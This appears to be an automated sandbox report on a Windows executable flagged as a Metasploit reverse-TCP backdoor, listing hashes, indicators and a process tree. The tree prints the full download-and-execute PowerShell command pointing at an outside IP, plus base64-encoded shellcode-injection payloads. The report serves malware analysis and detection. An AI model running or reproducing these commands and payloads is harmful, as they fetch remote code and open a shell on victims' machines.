metasploit | 404f125f646f530d65413d5e8051057388d6588747a690c0489b3041666b975d

Analysis

max time kernel
140s
max time network
140s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
20/07/2023, 11:23

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

paulina.exe
Size

112KB
MD5

621a04242906d9533c1b80830eb7b06f
SHA1

d15ccff956077635bd731efcd4f7797e6315812d
SHA256

404f125f646f530d65413d5e8051057388d6588747a690c0489b3041666b975d
SHA512

7825a619e126d53c0d748f900b05e2ad0f7358bc5bde5c49df67311d997ce4ab1095486727df97bc268154119dbd1d95dcfc3cce0e927c74530bbca2d2987789
SSDEEP

1536:DM3k8S+t3NI0zQIEZWGwZZXcB9ochV/WEIXAsnguANyQuOvE0TIiLlo8Wpa:IUkFNIVEtMDuxNpa

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://74.207.240.21/powershell_attack.txt%20

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

74.207.240.21:9289

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1252	powershell.exe
3	2948	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1252	powershell.exe
572	powershell.exe
2948	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 2676	2972	paulina.exe	28
PID 2972 wrote to memory of 2676	2972	paulina.exe	28
PID 2972 wrote to memory of 2676	2972	paulina.exe	28
PID 2676 wrote to memory of 1252	2676	cmd.exe	30
PID 2676 wrote to memory of 1252	2676	cmd.exe	30
PID 2676 wrote to memory of 1252	2676	cmd.exe	30
PID 1252 wrote to memory of 572	1252	powershell.exe	31
PID 1252 wrote to memory of 572	1252	powershell.exe	31
PID 1252 wrote to memory of 572	1252	powershell.exe	31
PID 572 wrote to memory of 2948	572	powershell.exe	32
PID 572 wrote to memory of 2948	572	powershell.exe	32
PID 572 wrote to memory of 2948	572	powershell.exe	32
PID 572 wrote to memory of 2948	572	powershell.exe	32
PID 2948 wrote to memory of 2740	2948	powershell.exe	33
PID 2948 wrote to memory of 2740	2948	powershell.exe	33
PID 2948 wrote to memory of 2740	2948	powershell.exe	33
PID 2948 wrote to memory of 2740	2948	powershell.exe	33
PID 2740 wrote to memory of 2868	2740	csc.exe	34
PID 2740 wrote to memory of 2868	2740	csc.exe	34
PID 2740 wrote to memory of 2868	2740	csc.exe	34
PID 2740 wrote to memory of 2868	2740	csc.exe	34

C:\Users\Admin\AppData\Local\Temp\paulina.exe
"C:\Users\Admin\AppData\Local\Temp\paulina.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe "IEX ((new-object net.webclient).downloadstring('http://74.207.240.21/powershell_attack.txt '))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "IEX ((new-object net.webclient).downloadstring('http://74.207.240.21/powershell_attack.txt '))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABWAHgAdwAgAD0AIAAnACQAegBIAHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAegBIAHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMANgAsADAAeABiAGIALAAwAHgANAA2ACwAMAB4ADcANgAsADAAeABmAGMALAAwAHgAYgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABjADIALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAAxAGMALAAwAHgANgA1ACwAMAB4ADEAZQAsADAAeAA0ADIALAAwAHgANQBjACwAMAB4ADYAMQAsADAAeAA1ADEALAAwAHgAYQBkACwAMAB4ADkAYwAsADAAeAA3ADIALAAwAHgAMABlACwAMAB4ADkAZgAsADAAeAA0AGUALAAwAHgAZgBiACwAMAB4ADIAYgAsADAAeABiAGIALAAwAHgAZQA1ACwAMAB4AGEAZQAsADAAeAA4ADMALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAA0ADIALAAwAHgANgBmACwAMAB4ADkAZAAsADAAeAA1AGYALAAwAHgAZAAwACwAMAB4ADEAZAAsADAAeAAwAGEALAAwAHgANgBlACwAMAB4ADEAOQAsADAAeABlAGUALAAwAHgAZgBkACwAMAB4AGQAYQAsADAAeABjADMALAAwAHgAYwAwACwAMAB4AGMAMQAsADAAeAA3ADYALAAwAHgAMwA3ACwAMAB4ADQAMgAsADAAeABiAGUALAAwAHgAOAA0ACwAMAB4ADYANAAsADAAeABhADQALAAwAHgAZgBmACwAMAB4ADQANwAsADAAeAA3ADkALAAwAHgAYQA1ACwAMAB4ADMAOAAsADAAeAAxAGUALAAwAHgAZgA3ACwAMAB4ADQAYQAsADAAeAA5ADQALAAwAHgAZgA3ACwAMAB4ADcAYwAsADAAeABjADYALAAwAHgAMAA5ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAZABiACwAMAB4ADIAOAAsADAAeAA1ADIALAAwAHgANABlACwAMAB4ADYAMwAsADAAeAA1ADMALAAwAHgAZAA3ACwAMAB4ADkAMQAsADAAeAAxADAALAAwAHgAZQBmACwAMAB4AGQANgAsADAAeABjADEALAAwAHgANQAyACwAMAB4AGIANwAsADAAeABmADgALAAwAHgAYgAxACwAMAB4AGUAZgAsADAAeAAwADAALAAwAHgAZQAwACwAMAB4ADMAMAAsADAAeAAyADMALAAwAHgAMQA1ACwAMAB4AGQAOQAsADAAeAA0ADcALAAwAHgAZgBmACwAMAB4ADIANwAsADAAeAAyADYALAAwAHgAZQBlACwAMAB4ADcANAAsADAAeAA3ADMALAAwAHgANQAzACwAMAB4AGYAMAAsADAAeAA1AGMALAAwAHgANABkACwAMAB4AGEAMwAsADAAeAA1AGYALAAwAHgAYQAxACwAMAB4ADYAMQAsADAAeAAyAGUALAAwAHgAYQAxACwAMAB4AGUANQAsADAAeAA0ADYALAAwAHgAZAAwACwAMAB4AGQANAAsADAAeAAxAGQALAAwAHgAYgA1ACwAMAB4ADYAZAAsADAAeABlAGYALAAwAHgAZQA1ACwAMAB4AGMANwAsADAAeABhADkALAAwAHgANwBhACwAMAB4AGYAYQAsADAAeAA2ADAALAAwAHgAMwBhACwAMAB4AGQAYwAsADAAeABkAGUALAAwAHgAOQAxACwAMAB4AGUAZgAsADAAeABiAGIALAAwAHgAOQA1ACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAYwBmACwAMAB4AGYAMgAsADAAeAA4ADIALAAwAHgANQBiACwAMAB4ADEAYwAsADAAeAA4ADkALAAwAHgAYgBmACwAMAB4AGQAMAAsADAAeABhADMALAAwAHgANQBlACwAMAB4ADMANgAsADAAeABhADIALAAwAHgAOAA3ACwAMAB4ADcAYQAsADAAeAAxADIALAAwAHgANwAxACwAMAB4AGEAOQAsADAAeABkAGIALAAwAHgAZgBlACwAMAB4AGQANAAsADAAeABkADYALAAwAHgAMwBjACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgANwAyACwAMAB4ADMANgAsADAAeAA0ADUALAAwAHgAZABjACwAMAB4ADAAMwAsADAAeABiADcALAAwAHgAOQA1ACwAMAB4AGUAMQAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADUAOQAsADAAeAAyAGYALAAwAHgANgAyACwAMAB4AGIAMAAsADAAeABmADUALAAwAHgAMwA4ACwAMAB4ADEAMQAsADAAeAA4ADIALAAwAHgANQBhACwAMAB4ADkAMgAsADAAeABiAGQALAAwAHgAYQBlACwAMAB4ADEAMwAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4AGEANgAsADAAeAAzADQALAAwAHgAYgBmACwAMAB4ADkANQAsADAAeAAwADAALAAwAHgANQA0ACwAMAB4ADMAZQAsADAAeAAxADYALAAwAHgANwAxACwAMAB4ADcAYwAsADAAeAA4ADQALAAwAHgANAAyACwAMAB4ADIAMQAsADAAeAAxADYALAAwAHgAMgBkACwAMAB4AGUAYgAsADAAeABhAGEALAAwAHgAZQA2ACwAMAB4AGQAMgAsADAAeAAzAGUALAAwAHgANAA2ACwAMAB4AGUAZAAsADAAeAA0ADQALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAwADEALAAwAHgAOAAxACwAMAB4ADYAMwAsADAAeAA2ADUALAAwAHgAZQAyACwAMAB4ADgAZAAsADAAeAAzAGEALAAwAHgAZQAwACwAMAB4ADAANAAsADAAeAA5AGQALAAwAHgAZQBjACwAMAB4AGEAMgAsADAAeAA5ADgALAAwAHgANQBkACwAMAB4ADUAZAAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4ADMANQAsADAAeABiADcALAAwAHgAOABjACwAMAB4AGIANgAsADAAeAAyADUALAAwAHgAYgA4ACwAMAB4ADQANgAsADAAeABkAGYALAAwAHgAYwBmACwAMAB4ADUANwAsADAAeAAzAGYALAAwAHgAYgA3ACwAMAB4ADYANwAsADAAeABjADEALAAwAHgAMQBhACwAMAB4ADQAMwAsADAAeAAxADYALAAwAHgAMABlACwAMAB4AGIAMQAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADgANAAsADAAeAAzADYALAAwAHgAYwBkACwAMAB4AGQANgAsADAAeAA2AGQALAAwAHgAMwAyACwAMAB4AGQAZAAsADAAeAA4AGUALAAwAHgAOQBkACwAMAB4ADAAOQAsADAAeABiAGYALAAwAHgAMQA4ACwAMAB4AGEAMQAsADAAeABhADcALAAwAHgAYQBhACwAMAB4AGEANAAsADAAeAAzADcALAAwAHgANABjACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAYQBmACwAMAB4ADQAZQAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgAOABmACwAMAB4ADQAOAAsADAAeABiADkALAAwAHgAMgA0ACwAMAB4ADcAMAAsADAAeAAyADYALAAwAHgAYwA2ACwAMAB4AGEAOAAsADAAeAA3ADAALAAwAHgAYgA2ACwAMAB4ADkAMAAsADAAeABhADIALAAwAHgANwAwACwAMAB4AGQAZQAsADAAeAA0ADQALAAwAHgAOQA3ACwAMAB4ADIAMgAsADAAeABmAGIALAAwAHgAOABhACwAMAB4ADAAMgAsADAAeAA1ADcALAAwAHgANQAwACwAMAB4ADEAZgAsADAAeABhAGQALAAwAHgAMABlACwAMAB4ADAANQAsADAAeAA4ADgALAAwAHgAYwA1ACwAMAB4AGEAYwAsADAAeAA3ADAALAAwAHgAZgBlACwAMAB4ADQAOQAsADAAeAA0AGUALAAwAHgANQA3ACwAMAB4AGYAZQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4ADkAMQAsADAAeAA3ADQALAAwAHgAZAA3ACwAMAB4ADEAOQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAaQA4ADgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGkAOAA4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABpADgAOAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFYAeAB3ACkAKQA7ACQAVABMAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAB3ADIASQBrACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHcAMgBJAGsAIAAkAFQATABXACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFQATABXACAAJABlACIAOwB9AA==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:572
    - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAB6AEgAcgAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHoASAByACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjADYALAAwAHgAYgBiACwAMAB4ADQANgAsADAAeAA3ADYALAAwAHgAZgBjACwAMAB4AGIANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQBhACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAYwAyACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAMQBjACwAMAB4ADYANQAsADAAeAAxAGUALAAwAHgANAAyACwAMAB4ADUAYwAsADAAeAA2ADEALAAwAHgANQAxACwAMAB4AGEAZAAsADAAeAA5AGMALAAwAHgANwAyACwAMAB4ADAAZQAsADAAeAA5AGYALAAwAHgANABlACwAMAB4AGYAYgAsADAAeAAyAGIALAAwAHgAYgBiACwAMAB4AGUANQAsADAAeABhAGUALAAwAHgAOAAzACwAMAB4AGMAZgAsADAAeABhAGIALAAwAHgANAAyACwAMAB4ADYAZgAsADAAeAA5AGQALAAwAHgANQBmACwAMAB4AGQAMAAsADAAeAAxAGQALAAwAHgAMABhACwAMAB4ADYAZQAsADAAeAAxADkALAAwAHgAZQBlACwAMAB4AGYAZAAsADAAeABkAGEALAAwAHgAYwAzACwAMAB4AGMAMAAsADAAeABjADEALAAwAHgANwA2ACwAMAB4ADMANwAsADAAeAA0ADIALAAwAHgAYgBlACwAMAB4ADgANAAsADAAeAA2ADQALAAwAHgAYQA0ACwAMAB4AGYAZgAsADAAeAA0ADcALAAwAHgANwA5ACwAMAB4AGEANQAsADAAeAAzADgALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeAA0AGEALAAwAHgAOQA0ACwAMAB4AGYANwAsADAAeAA3AGMALAAwAHgAYwA2ACwAMAB4ADAAOQAsADAAeAA3AGMALAAwAHgAYwAwACwAMAB4AGQAYgAsADAAeAAyADgALAAwAHgANQAyACwAMAB4ADQAZQAsADAAeAA2ADMALAAwAHgANQAzACwAMAB4AGQANwAsADAAeAA5ADEALAAwAHgAMQAwACwAMAB4AGUAZgAsADAAeABkADYALAAwAHgAYwAxACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgAZgA4ACwAMAB4AGIAMQAsADAAeABlAGYALAAwAHgAMAAwACwAMAB4AGUAMAAsADAAeAAzADAALAAwAHgAMgAzACwAMAB4ADEANQAsADAAeABkADkALAAwAHgANAA3ACwAMAB4AGYAZgAsADAAeAAyADcALAAwAHgAMgA2ACwAMAB4AGUAZQAsADAAeAA3ADQALAAwAHgANwAzACwAMAB4ADUAMwAsADAAeABmADAALAAwAHgANQBjACwAMAB4ADQAZAAsADAAeABhADMALAAwAHgANQBmACwAMAB4AGEAMQAsADAAeAA2ADEALAAwAHgAMgBlACwAMAB4AGEAMQAsADAAeABlADUALAAwAHgANAA2ACwAMAB4AGQAMAAsADAAeABkADQALAAwAHgAMQBkACwAMAB4AGIANQAsADAAeAA2AGQALAAwAHgAZQBmACwAMAB4AGUANQAsADAAeABjADcALAAwAHgAYQA5ACwAMAB4ADcAYQAsADAAeABmAGEALAAwAHgANgAwACwAMAB4ADMAYQAsADAAeABkAGMALAAwAHgAZABlACwAMAB4ADkAMQAsADAAeABlAGYALAAwAHgAYgBiACwAMAB4ADkANQAsADAAeAA5AGUALAAwAHgANAA0ACwAMAB4AGMAZgAsADAAeABmADIALAAwAHgAOAAyACwAMAB4ADUAYgAsADAAeAAxAGMALAAwAHgAOAA5ACwAMAB4AGIAZgAsADAAeABkADAALAAwAHgAYQAzACwAMAB4ADUAZQAsADAAeAAzADYALAAwAHgAYQAyACwAMAB4ADgANwAsADAAeAA3AGEALAAwAHgAMQAyACwAMAB4ADcAMQAsADAAeABhADkALAAwAHgAZABiACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAZAA2ACwAMAB4ADMAYwAsADAAeABhADYALAAwAHgAOAA5ACwAMAB4ADcAMgAsADAAeAAzADYALAAwAHgANAA1ACwAMAB4AGQAYwAsADAAeAAwADMALAAwAHgAYgA3ACwAMAB4ADkANQAsADAAeABlADEALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAA1ADkALAAwAHgAMgBmACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZgA1ACwAMAB4ADMAOAAsADAAeAAxADEALAAwAHgAOAAyACwAMAB4ADUAYQAsADAAeAA5ADIALAAwAHgAYgBkACwAMAB4AGEAZQAsADAAeAAxADMALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeABhADYALAAwAHgAMwA0ACwAMAB4AGIAZgAsADAAeAA5ADUALAAwAHgAMAAwACwAMAB4ADUANAAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4ADcAMQAsADAAeAA3AGMALAAwAHgAOAA0ACwAMAB4ADQAMgAsADAAeAAyADEALAAwAHgAMQA2ACwAMAB4ADIAZAAsADAAeABlAGIALAAwAHgAYQBhACwAMAB4AGUANgAsADAAeABkADIALAAwAHgAMwBlACwAMAB4ADQANgAsADAAeABlAGQALAAwAHgANAA0ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMAAxACwAMAB4ADgAMQAsADAAeAA2ADMALAAwAHgANgA1ACwAMAB4AGUAMgAsADAAeAA4AGQALAAwAHgAMwBhACwAMAB4AGUAMAAsADAAeAAwADQALAAwAHgAOQBkACwAMAB4AGUAYwAsADAAeABhADIALAAwAHgAOQA4ACwAMAB4ADUAZAAsADAAeAA1AGQALAAwAHgAMAAzACwAMAB4ADQAOQAsADAAeAAzADUALAAwAHgAYgA3ACwAMAB4ADgAYwAsADAAeABiADYALAAwAHgAMgA1ACwAMAB4AGIAOAAsADAAeAA0ADYALAAwAHgAZABmACwAMAB4AGMAZgAsADAAeAA1ADcALAAwAHgAMwBmACwAMAB4AGIANwAsADAAeAA2ADcALAAwAHgAYwAxACwAMAB4ADEAYQAsADAAeAA0ADMALAAwAHgAMQA2ACwAMAB4ADAAZQAsADAAeABiADEALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA4ADQALAAwAHgAMwA2ACwAMAB4AGMAZAAsADAAeABkADYALAAwAHgANgBkACwAMAB4ADMAMgAsADAAeABkAGQALAAwAHgAOABlACwAMAB4ADkAZAAsADAAeAAwADkALAAwAHgAYgBmACwAMAB4ADEAOAAsADAAeABhADEALAAwAHgAYQA3ACwAMAB4AGEAYQAsADAAeABhADQALAAwAHgAMwA3ACwAMAB4ADQAYwAsADAAeAA3AGQALAAwAHgAZgAzACwAMAB4AGEAZgAsADAAeAA0AGUALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeAA3ADAALAAwAHgAYgAwACwAMAB4ADgAZgAsADAAeAA0ADgALAAwAHgAYgA5ACwAMAB4ADIANAAsADAAeAA3ADAALAAwAHgAMgA2ACwAMAB4AGMANgAsADAAeABhADgALAAwAHgANwAwACwAMAB4AGIANgAsADAAeAA5ADAALAAwAHgAYQAyACwAMAB4ADcAMAAsADAAeABkAGUALAAwAHgANAA0ACwAMAB4ADkANwAsADAAeAAyADIALAAwAHgAZgBiACwAMAB4ADgAYQAsADAAeAAwADIALAAwAHgANQA3ACwAMAB4ADUAMAAsADAAeAAxAGYALAAwAHgAYQBkACwAMAB4ADAAZQAsADAAeAAwADUALAAwAHgAOAA4ACwAMAB4AGMANQAsADAAeABhAGMALAAwAHgANwAwACwAMAB4AGYAZQAsADAAeAA0ADkALAAwAHgANABlACwAMAB4ADUANwAsADAAeABmAGUALAAwAHgAYgA2ACwAMAB4ADkAOQAsADAAeAA5ADEALAAwAHgANwA0ACwAMAB4AGQANwAsADAAeAAxADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGkAOAA4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABpADgAOAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaQA4ADgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2948
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wekta6vy.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2740
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA545.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA544.tmp"
        7⤵
        
        PID:2868

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA545.tmp

Filesize
1KB

MD5
70296c435ebfe65cba9007f371f7b05b

SHA1
